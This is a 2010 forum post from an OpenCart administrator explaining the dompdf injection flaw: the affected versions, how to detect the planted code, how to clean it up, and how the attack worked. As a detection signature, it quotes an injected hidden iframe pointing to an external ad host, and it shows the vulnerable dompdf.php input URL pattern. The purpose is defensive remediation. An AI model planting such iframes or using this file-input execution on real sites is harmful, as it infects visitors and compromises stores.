Post by Qphoria » Wed Apr 21, 2010 5:28 am

This is just a better summary of the dompdf injection script issue including what it is, what caused it, how to check for it, what it does, and how to fix it.

What Is it?
OpenCart includes a few other 3rd party opensource classes in the core that are NOT coded by the OpenCart team. One of them is a pdf library that allows PDF files to be created on-the-fly called "dompdf". This class was added a while back with plans to use it for PDF Invoices. But it has not been used by the core yet. Recently it seems that a hacker found an exploit in the dompdf code that allows it to access the opencart database and filesystem from within, and inject some code onto your site.

Which versions are affected?
The dompdf class was exploitable in versions 1.4.6 and earlier. 1.4.7 and later removed the dompdf class, but if you did an upgrade from an older version, be sure that you follow the removal steps just to be sure.

What does it do?
The exploit simply add an iframe to your page which appears to be an ad script designed to show ads on your site. But it doesn't appear to be up at this time.

How to check for it? (All versions)
Checking to see if you've been injected is easy.
1. Load your store in any browser
2. Right click and choose "View Source"
3. Search the source (Ctrl+F) for "iframe"
4. If you see something like:

Code: Select all

<iframe width=0 height=0 style=\'display:none\' src="http://adsanalytics.net/in.cgi?2"></iframe>
Then the exploit has been run on your site.

How to fix it?
Remove the exploitable File first
1. Goto your ftp and find the system/helper folder. Inside that folder is a folder called "dompdf"
2. Delete that folder
earlier it was believed that only the dompdf.php file inside was faulty, but new information shows that there are other files in that folder that can also be used to exploit. So it is best to remove the entire folder

Remove the injected code from your site:
The script has shown that it can inject in 2 ways:
1. In the Welcome Message on the homepage
2. In the Footer
It is best to check both places
For the Welcome Message:
1. Goto the admin page and Edit the System->Settings (Use IE if FF is giving attack warning)
2. In the welcome message editor, choose "SOURCE"
3. Search for the iframe code above and remove all instances of it
For the Footer:
1. Log into your FTP client
2. Edit: catalog/view/theme/YOURTHEME/template/common/footer.tpl
3. Search for the iframe code above and remove all instances of it
4. Save and Upload the changes

How did it happen?
The "dompdf.php" file accepts an input file as part of the url. This file then gets turned into a pdf file.
Example:

Code: Select all

http://www.example.com/shop/dompdf/dompdf.php?input=filename.txt
The code will process this file make a new "filename.pdf" file.

The hacker made a custom "conf.txt" file that had php code inside of it, and the dompdf file apparently doesn't check for code and as it executed it, it was executing the commands inside that file. So all a hacker would need to do is run that example above on your shop manually and it would execute.

What if Google flags my page as an "Attack Site" ?
After performing the above steps to fix the issue. You can go here to follow the steps to have them review your site.
http://www.stopbadware.org/home/reviewinfo


Tags: Hacking, malware, Hacked, Attack site

User avatar
Administrator

Posts

Joined
Tue Jul 22, 2008 3:02 am
Who is online

Users browsing this forum: No registered users and 106 guests